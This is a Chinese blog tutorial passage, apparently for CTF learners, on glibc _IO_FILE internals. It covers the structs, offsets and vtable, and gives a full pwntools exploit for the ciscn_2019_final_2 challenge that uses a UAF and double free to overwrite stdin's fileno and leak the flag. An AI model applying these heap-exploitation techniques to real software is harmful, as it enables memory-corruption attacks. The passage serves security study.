

<!DOCTYPE html>
<html lang="en" color-mode=light>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
  <meta http-equiv="X-UA-Compatible" content="ie=edge">
  <title>_IO_FLIE - ShouCheng</title>
  <meta name="apple-mobile-web-app-capable" content="yes" />
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta name="google" content="notranslate" />
  
  <meta name="description" content="利用环境介绍的函数都是glibc-2.23及以下适用，...">
  <meta name="author" content="ShouCheng">
  <link rel="icon" href="/images/icons/favicon-16x16.png" type="image/png" sizes="16x16">
  <link rel="icon" href="/images/icons/favicon-32x32.png" type="image/png" sizes="32x32">
  <link rel="apple-touch-icon" href="/images/icons/apple-touch-icon.png" sizes="180x180">
  <meta rel="mask-icon" href="/images/icons/stun-logo.svg" color="#333333">
  
    <meta rel="msapplication-TileImage" content="/images/icons/favicon-144x144.png">
    <meta rel="msapplication-TileColor" content="#000000">
  

  
<link rel="stylesheet" href="/css/style.css">


  
    
<link rel="stylesheet" href="//at.alicdn.com/t/font_1445822_r673sha78lq.css">

  

  
    
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.css">

  

  
    
      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/xcode.min.css" name="highlight-style" mode="light">

      
        
        
<link rel="stylesheet" href="https://cdn.bootcss.com/highlight.js/9.18.1/styles/solarized-dark.min.css" name="highlight-style" mode="dark">

      
  

  <script>
    var CONFIG = window.CONFIG || {};
    var ZHAOO = window.ZHAOO || {};
    CONFIG = {
      isHome: false,
      fancybox: true,
      pjax: false,
      lazyload: {
        enable: true,
        only_post: 'false',
        loading: '[object Object]'
      },
      donate: {
        enable: false,
        alipay: '',
        wechat: ''
      },
      galleries: {
        enable: true
      },
      fab: {
        enable: true,
        always_show: false
      },
      carrier: {
        enable: true
      },
      daovoice: {
        enable: true
      },
      preview: {
        background: {
          default: '',
          api: ''
        },
        motto: {
          default: '总之岁月漫长，然而值得等待！',
          typing: true,
          api: 'https://v2.jinrishici.com/one.json',
          data_contents: '["data","content"]'
        },
      },
      qrcode: {
        enable: true,
        type: 'url',
        image: '',
      },
      toc: {
        enable: true
      },
      scrollbar: {
        type: 'default'
      },
      notification: {
        enable: true,
        delay: 4500,
        list: '',
        page_white_list: '',
        page_black_list: ''
      },
      search: {
        enable: true,
        path: '/search.xml'
      }
    }
  </script>

  

  

<meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="ShouCheng" type="application/atom+xml">
</head>

<body class="lock-screen">
  <div class="loading"></div>
  
    


  <nav class="navbar">
    <div class="left">
      
        <i class="iconfont iconhome j-navbar-back-home"></i>
      
      
        <i class="iconfont iconqrcode j-navbar-qrcode"></i>
      
      
        <i class="iconfont iconmoono" id="color-toggle" color-toggle="light"></i>
      
      
        <i class="iconfont iconsearch j-navbar-search"></i>
      
    </div>
    <div class="center">_IO_FLIE</div>
    <div class="right">
      <i class="iconfont iconmenu j-navbar-menu"></i>
    </div>
    
      <div id="qrcode-navbar"></div>
    
  </nav>

  
  

<nav class="menu">
  <div class="menu-container">
    <div class="menu-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <ul class="menu-content"><li class="menu-item">
        <a href="/ " class="underline "> 首页</a>
      </li><li class="menu-item">
        <a href="/galleries/ " class="underline "> 摄影</a>
      </li><li class="menu-item">
        <a href="/archives/ " class="underline "> 归档</a>
      </li><li class="menu-item">
        <a href="/tags/ " class="underline "> 标签</a>
      </li><li class="menu-item">
        <a href="/categories/ " class="underline "> 分类</a>
      </li><li class="menu-item">
        <a href="/about/ " class="underline "> 关于</a>
      </li></ul>
    
      <div class="menu-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
    
  </div>
</nav>
  <main id="main">
  <div class="article-wrap">
    <div class="row container">
      <div class="col-xl-3"></div>
      <div class="col-xl-6"><article class="article">
  <div class="wrap">
    <section class="head">
  <img   class="lazyload" data-original="/images/theme/post-image.jpg" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="  draggable="false">
  <div class="head-mask">
    <h1 class="head-title">_IO_FLIE</h1>
    <div class="head-info">
      <span class="post-info-item"><i class="iconfont iconcalendar"></i>November 06, 2021</span>
      
      <span class="post-info-item"><i class="iconfont iconfont-size"></i>27396</span>
    </div>
  </div>
</section>
    <section class="main">
      <section class="content">
        <h1 id="利用环境"><a href="#利用环境" class="headerlink" title="利用环境"></a>利用环境</h1><p>介绍的函数都是glibc-2.23及以下适用，后面的内容才会介绍高版本的利用，但是也是在这个基础上对新检查的对抗与绕过</p>
<h1 id="IO-FILE"><a href="#IO-FILE" class="headerlink" title="_IO_FILE"></a>_IO_FILE</h1><h2 id="主要函数功能介绍"><a href="#主要函数功能介绍" class="headerlink" title="主要函数功能介绍"></a>主要函数功能介绍</h2><p><strong>FILE *fopen(const char *filename,  const char *mode)</strong></p>
<p>使用给定的模式 <strong>mode</strong> 打开 <strong>filename</strong> 所指向的文件，返回一个文件指针fp，fp指向存储在<strong>堆上</strong>的FILE结构体。如果打开失败则返回NULL</p>
<p><strong>size_t fread(void *ptr,  size_t size,  size_t nmemb,  FILE *stream)</strong></p>
<p> 从给定流 <strong>stream</strong> 读取数据到 <strong>ptr</strong> 所指向的数组中，返回成功读取的对象个数，若出现错误或到达文件末尾，则可能小于count</p>
<p><strong>size_t fwrite(const void *ptr,  size_t size,  size_t nmemb,  FILE *stream)</strong></p>
<p>把 <strong>ptr</strong> 所指向的数组中的数据写入到给定流 <strong>stream</strong> 中，返回实际写入的数据块数目</p>
<p><strong>int fclose(FILE *stream)</strong></p>
<p>关闭文件流，并且释放相应文件指针指向的缓冲区（堆块）</p>
<h2 id="主要结构体介绍"><a href="#主要结构体介绍" class="headerlink" title="主要结构体介绍"></a>主要结构体介绍</h2><p>当使用fopen打开一个文件，会在堆上分配一块内存用来存储_IO_FILE_plus结构体，FILE结构体有两个成员<code>_IO_FILE</code>以及<code>_IO_jump_t</code>，这两个成员也是结构体。如下源码：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">IO_FILE_plus</span></span><br><span class="hljs-class">&#123;</span><br>    _IO_FILE    file;<br>    _IO_jump_t   *vtable;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>_IO_FILE存储着一些文件相关的指针信息，该结构体的大小：64位下的长度为0xd8； 32位下的长度为0x94（以下涉及的都是64位）。源码如下：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">IO_FILE</span> &#123;</span><br>  <span class="hljs-keyword">long</span> <span class="hljs-keyword">int</span> _flags;       <span class="hljs-comment">/* High-order word is _IO_MAGIC; rest is flags. */</span><br>  <span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> _IO_file_flags _flags</span><br>    <br>  <span class="hljs-comment">/* The following pointers correspond to the C++ streambuf protocol. */</span><br>  <span class="hljs-comment">/* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */</span><br>  <span class="hljs-keyword">char</span>* _IO_read_ptr;   <span class="hljs-comment">/* Current read pointer */</span><br>  <span class="hljs-keyword">char</span>* _IO_read_end;   <span class="hljs-comment">/* End of get area. */</span><br>  <span class="hljs-keyword">char</span>* _IO_read_base;  <span class="hljs-comment">/* Start of get area. */</span><br>  <span class="hljs-keyword">char</span>* _IO_write_base; <span class="hljs-comment">/* Start of put area. */</span><br>  <span class="hljs-keyword">char</span>* _IO_write_ptr;  <span class="hljs-comment">/* Current put pointer. */</span><br>  <span class="hljs-keyword">char</span>* _IO_write_end;  <span class="hljs-comment">/* End of put area. */</span><br>  <span class="hljs-keyword">char</span>* _IO_buf_base;   <span class="hljs-comment">/* Start of reserve area. */</span><br>  <span class="hljs-keyword">char</span>* _IO_buf_end;    <span class="hljs-comment">/* End of reserve area. */</span><br>  <span class="hljs-comment">/* The following fields are used to support backing up and undo. */</span><br>  <span class="hljs-keyword">char</span> *_IO_save_base; <span class="hljs-comment">/* Pointer to start of non-current get area. */</span><br>  <span class="hljs-keyword">char</span> *_IO_backup_base;  <span class="hljs-comment">/* Pointer to first valid character of backup area */</span><br>  <span class="hljs-keyword">char</span> *_IO_save_end; <span class="hljs-comment">/* Pointer to end of non-current get area. */</span><br> <br>  <span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">IO_marker</span> *_<span class="hljs-title">markers</span>;</span><br> <br>  <span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">IO_FILE</span> *_<span class="hljs-title">chain</span>;</span><br> <br>  <span class="hljs-keyword">int</span> _fileno;<br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> 0</span><br>  <span class="hljs-keyword">int</span> _blksize;<br><span class="hljs-meta">#<span class="hljs-meta-keyword">else</span></span><br>  <span class="hljs-keyword">int</span> _flags2;<br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br>  _IO_off_t _old_offset; <span class="hljs-comment">/* This used to be _offset but it&#x27;s too small.  */</span><br> <br><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> __HAVE_COLUMN <span class="hljs-comment">/* temporary */</span></span><br>  <span class="hljs-comment">/* 1+column number of pbase(); 0 is unknown. */</span><br>  <span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">short</span> _cur_column;<br>  <span class="hljs-keyword">signed</span> <span class="hljs-keyword">char</span> _vtable_offset;<br>  <span class="hljs-keyword">char</span> _shortbuf[<span class="hljs-number">1</span>];<br> <br><span class="hljs-comment">/*  char* _save_gptr;  char* _save_egptr; */</span><br> <br>_IO_lock_t *_lock;<br><span class="hljs-meta">#<span class="hljs-meta-keyword">ifdef</span> _IO_USE_OLD_IO_FILE</span><br>&#125;;<br></code></pre></td></tr></table></figure>

<p>在 _IO_FILE 中的各变量的偏移：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-number">0x0</span>   _flags<br><span class="hljs-number">0x8</span>   _IO_read_ptr<br><span class="hljs-number">0x10</span>  _IO_read_end<br><span class="hljs-number">0x18</span>  _IO_read_base<br><span class="hljs-number">0x20</span>  _IO_write_base<br><span class="hljs-number">0x28</span>  _IO_write_ptr<br><span class="hljs-number">0x30</span>  _IO_write_end<br><span class="hljs-number">0x38</span>  _IO_buf_base<br><span class="hljs-number">0x40</span>  _IO_buf_end<br><span class="hljs-number">0x48</span>  _IO_save_base<br><span class="hljs-number">0x50</span>  _IO_backup_base<br><span class="hljs-number">0x58</span>  _IO_save_end<br><span class="hljs-number">0x60</span>  _markers<br><span class="hljs-number">0x68</span>  _chain<br><span class="hljs-number">0x70</span>  _fileno<br><span class="hljs-number">0x74</span>  _flags2<br><span class="hljs-number">0x78</span>  _old_offset<br><span class="hljs-number">0x80</span>  _cur_column<br><span class="hljs-number">0x82</span>  _vtable_offset<br><span class="hljs-number">0x83</span>  _shortbuf<br><span class="hljs-number">0x88</span>  _lock<br><span class="hljs-number">0x90</span>  _offset<br><span class="hljs-number">0x98</span>  _codecvt<br><span class="hljs-number">0xa0</span>  _wide_data<br><span class="hljs-number">0xa8</span>  _freeres_list<br><span class="hljs-number">0xb0</span>  _freeres_buf<br><span class="hljs-number">0xb8</span>  __pad5<br><span class="hljs-number">0xc0</span>  _mode<br><span class="hljs-number">0xc4</span>  _unused2<br><span class="hljs-number">0xd8</span>  vtable<br></code></pre></td></tr></table></figure>

<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211122203241140.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211122203241140</span></p>
<p>在glibc-2.23版本中有个全局变量<code>_IO_list_all</code>，该变量指向了FILE链表的头部。在没有创建其它文件结构时，<code>_IO_list_all</code>指向stderr，然后依次是stdout和stdin。这里使用<code>p/x *(struct _IO_FILE_plus*) _IO_list_all</code>可以详细的打印其内存数据信息。其中<code>_fileno</code>的值就是文件描述符，<code>_chain</code>字段指向下一个链表节点</p>
<p>所有的文件都共享一个虚函数表，_IO_jump_t  *vtable则指向这个虚函数表（保存各种操作函数的指针），源码如下：JUMP_FIELD 是一个接收两个参数的宏，前一个参数为类型名，后一个为变量名</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-meta-keyword">define</span> JUMP_FIELD(TYPE, NAME) TYPE NAME</span><br><span class="hljs-class"><span class="hljs-keyword">struct</span> _<span class="hljs-title">IO_jump_t</span></span><br><span class="hljs-class">&#123;</span><br>    JUMP_FIELD(<span class="hljs-keyword">size_t</span>, __dummy);<br>    JUMP_FIELD(<span class="hljs-keyword">size_t</span>, __dummy2);<br>    JUMP_FIELD(_IO_finish_t, __finish);<br>    JUMP_FIELD(_IO_overflow_t, __overflow);<br>    JUMP_FIELD(_IO_underflow_t, __underflow);<br>    JUMP_FIELD(_IO_underflow_t, __uflow);<br>    JUMP_FIELD(_IO_pbackfail_t, __pbackfail);<br>    <span class="hljs-comment">/* showmany */</span><br>    JUMP_FIELD(_IO_xsputn_t, __xsputn);<br>    JUMP_FIELD(_IO_xsgetn_t, __xsgetn);<br>    JUMP_FIELD(_IO_seekoff_t, __seekoff);<br>    JUMP_FIELD(_IO_seekpos_t, __seekpos);<br>    JUMP_FIELD(_IO_setbuf_t, __setbuf);<br>    JUMP_FIELD(_IO_sync_t, __sync);<br>    JUMP_FIELD(_IO_doallocate_t, __doallocate);<br>    JUMP_FIELD(_IO_read_t, __read);<br>    JUMP_FIELD(_IO_write_t, __write);<br>    JUMP_FIELD(_IO_seek_t, __seek);<br>    JUMP_FIELD(_IO_close_t, __close);<br>    JUMP_FIELD(_IO_stat_t, __stat);<br>    JUMP_FIELD(_IO_showmanyc_t, __showmanyc);<br>    JUMP_FIELD(_IO_imbue_t, __imbue);<br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> 0</span><br>    get_column;<br>    set_column;<br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br>&#125;;<br></code></pre></td></tr></table></figure>

<p>在gdb中查看，会对存储的函数指针更加详细的名称</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211122204732406.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211122204732406</span></p>
<h2 id="利用手法"><a href="#利用手法" class="headerlink" title="利用手法"></a>利用手法</h2><h3 id="一、利用-fileno"><a href="#一、利用-fileno" class="headerlink" title="一、利用_fileno"></a>一、利用_fileno</h3><p>因为<code>_fileno</code>的值就是文件描述符，有时 flag 文件已经被程序打开，创建了相应的文件描述符。如果我们将这个文件描述符的值填入到<code>stdin</code>的<code>_fileno</code>处，那么当使用到如<code>scanf、gets、fscanf</code>函数会调用到<code>stdin</code>，获取的到的字符就就会是flag的内容。</p>
<h4 id="例题ciscn-2019-final-2"><a href="#例题ciscn-2019-final-2" class="headerlink" title="例题ciscn_2019_final_2"></a>例题ciscn_2019_final_2</h4><p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211128191339962.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211128191339962</span></p>
<p>常规checksec，64位，保护全开</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211128191623857-16380981914061.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211128191623857</span></p>
<p>程序开了沙箱，禁用了execve系统执行函数</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211128191723423.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211128191723423</span></p>
<p>程序在初始化时，打开了flag文件，并且把文件描述符转为了666</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211128191423540.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211128191423540</span></p>
<p>释放堆块存在UAF</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211128191445436.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211128191445436</span></p>
<p>申请堆块只能申请0x10和0x20的堆块</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211128211402143.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211128211402143</span></p>
<p>还有个输入函数，执行完会把输入的内容打印出来</p>
<p>所以做法是劫持 stdin 的 fileno 为666从而读取flag内容并且打印出来，因为 scanf 获取的输入是来自于 stdin ，如果把 stdin 的fileno 修改为之前 flag 文件流对应的文件描述符666，即可实现 stdin 从flag里面读取内容，然后程序会把内容打印出来，从而获得flag</p>
<p>这边最有意思的点在于最后要分配到 stdin 上的堆块，由于泄露的地址是不全的，并且我们的任意分配是借助 double free 制造的堆块重叠，是不存在0x7f的头的，所以要申请出一块含有0x7f头的堆块，部分写修改0x7f为 stdin 的地址，然后在double free制造出堆块重叠时，借助第一次申请，把fd指向的堆块地址修改为含有 stdin 的地址的堆块，就能让其也成为tcache链上的一个堆块，从而成功分配出堆块</p>
<p><img   class="lazyload" data-original="/2021/11/06/2021-11-06-IO-FLIE/image-20211128211228537.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg==" ><span class="image-caption">image-20211128211228537</span></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-comment">#!usr/bin/env python </span><br><span class="hljs-comment">#coding=utf-8</span><br><span class="hljs-keyword">from</span> pwn <span class="hljs-keyword">import</span> *<br>context(arch = <span class="hljs-string">&#x27;amd64&#x27;</span>,os = <span class="hljs-string">&#x27;linux&#x27;</span>,log_level = <span class="hljs-string">&#x27;debug&#x27;</span>)<br>elf = ELF(<span class="hljs-string">&quot;./ciscn_final_2&quot;</span>)<br>libc = ELF(<span class="hljs-string">&quot;/home/shoucheng/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so&quot;</span>)<br><span class="hljs-comment">#libc = ELF(&quot;./libc.so.6&quot;)</span><br>ld = ELF(<span class="hljs-string">&quot;/home/shoucheng/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so&quot;</span>)<br>p = process(argv=[ld.path,elf.path],env=&#123;<span class="hljs-string">&quot;LD_PRELOAD&quot;</span> : libc.path&#125;)<br>p = remote(<span class="hljs-string">&quot;node4.buuoj.cn&quot;</span>, <span class="hljs-number">25539</span>)<br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">debug</span>():</span><br>	gdb.attach(p,<span class="hljs-string">&quot;b main&quot;</span>)<br>	<span class="hljs-comment">#gdb.attach(p,&quot;b *$rebase(0x)&quot;)</span><br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">add</span>(<span class="hljs-params">idx, content</span>):</span><br>    p.sendlineafter(<span class="hljs-string">&quot;&gt; &quot;</span>,<span class="hljs-string">&#x27;1&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;&gt;&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx))<br>    p.recvuntil(<span class="hljs-string">&quot;your inode number:&quot;</span>)<br>    p.send(<span class="hljs-built_in">str</span>(content))<br>	<br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">edit</span>():</span><br>    p.sendlineafter(<span class="hljs-string">&quot;&gt; &quot;</span>,<span class="hljs-string">&#x27;4&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;what do you want to say at last?\n&quot;</span>)<br>    p.send(content)<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">show</span>(<span class="hljs-params">idx</span>):</span><br>    p.sendlineafter(<span class="hljs-string">&quot;&gt; &quot;</span>,<span class="hljs-string">&#x27;3&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot;&gt;&quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx))<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">free</span>(<span class="hljs-params">idx</span>):</span><br>    p.sendlineafter(<span class="hljs-string">&quot;&gt; &quot;</span>,<span class="hljs-string">&#x27;2&#x27;</span>)<br>    p.recvuntil(<span class="hljs-string">&quot; &quot;</span>)<br>    p.sendline(<span class="hljs-built_in">str</span>(idx))<br><br>add(<span class="hljs-number">1</span>, <span class="hljs-number">0x20</span>)<br>free(<span class="hljs-number">1</span>)<br>add(<span class="hljs-number">2</span>, <span class="hljs-number">0x20</span>)<br>free(<span class="hljs-number">1</span>)<br>show(<span class="hljs-number">1</span>)<br>p.recvuntil(<span class="hljs-string">&quot;your int type inode number :&quot;</span>)<br>heap_base = <span class="hljs-built_in">int</span>(p.recv(<span class="hljs-number">10</span>)) - <span class="hljs-number">0x250</span><br>log.info(<span class="hljs-string">&quot;heap_base==&gt;0x%x&quot;</span> %heap_base)<br>add(<span class="hljs-number">1</span>, heap_base)<br>add(<span class="hljs-number">1</span>, <span class="hljs-number">0x20</span>)<br>add(<span class="hljs-number">1</span>, <span class="hljs-number">0x20</span>)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">7</span>):<br>    free(<span class="hljs-number">1</span>)<br>    add(<span class="hljs-number">2</span>, <span class="hljs-number">0x20</span>)<br>free(<span class="hljs-number">1</span>)<br>show(<span class="hljs-number">1</span>)<br>p.recvuntil(<span class="hljs-string">&quot;your int type inode number :&quot;</span>)<br>libc_base = <span class="hljs-built_in">int</span>(p.recv(<span class="hljs-number">10</span>))  - <span class="hljs-number">0x3ebca0</span><br>log.info(<span class="hljs-string">&quot;libc_base==&gt;0x%x&quot;</span> %libc_base)<br>fileno = libc_base + <span class="hljs-number">0x3eba70</span><br>add(<span class="hljs-number">1</span>, <span class="hljs-number">0x0202</span>)<br>add(<span class="hljs-number">1</span>, fileno)<br>free(<span class="hljs-number">1</span>)<br>add(<span class="hljs-number">2</span>, fileno)<br>free(<span class="hljs-number">1</span>)<br>add(<span class="hljs-number">1</span>, heap_base + <span class="hljs-number">0x60</span>)<br>add(<span class="hljs-number">1</span>, <span class="hljs-number">666</span>)<br>add(<span class="hljs-number">1</span>, <span class="hljs-number">666</span>)<br>add(<span class="hljs-number">1</span>, <span class="hljs-number">666</span>)<br>edit()<br><br>p.interactive()<br></code></pre></td></tr></table></figure>



<h3 id="二、劫持文件流"><a href="#二、劫持文件流" class="headerlink" title="二、劫持文件流"></a>二、劫持文件流</h3><p>fopen函数在分配空间，建立FILE结构体，未调用vtable中的函数。执行流程如下：</p>
<ol>
<li><code>malloc</code>分配内存空间。</li>
<li><code>_IO_no_init</code> 对FILE结构体进行<code>null</code>初始化。</li>
<li><code>_IO_file_init</code>将结构体链接进<code>_IO_list_all</code>链表。</li>
<li><code>_IO_file_fopen</code>执行系统调用打开文件。</li>
</ol>
<p>fread函数中调用的vtable函数有：</p>
<ul>
<li><code>_IO_sgetn</code>函数调用了vtable的<code>_IO_file_xsgetn</code>。</li>
<li><code>_IO_doallocbuf</code>函数调用了vtable的<code>_IO_file_doallocate</code>以初始化输入缓冲区。</li>
<li>vtable中的<code>_IO_file_doallocate</code>调用了vtable中的<code>__GI__IO_file_stat</code>以获取文件信息。</li>
<li><code>__underflow</code>函数调用了vtable中的<code>_IO_new_file_underflow</code>实现文件数据读取到缓冲区。</li>
<li>vtable中的<code>_IO_new_file_underflow</code>调用了vtable<code>__GI__IO_file_read</code>最终去执行系统调用read。</li>
</ul>
<p>fwrite 函数调用的vtable函数有：</p>
<ul>
<li><code>_IO_fwrite</code>函数调用了vtable的<code>_IO_new_file_xsputn</code>。</li>
<li><code>_IO_new_file_xsputn</code>函数调用了vtable中的<code>_IO_new_file_overflow</code>实现缓冲区的建立以及刷新缓冲区。</li>
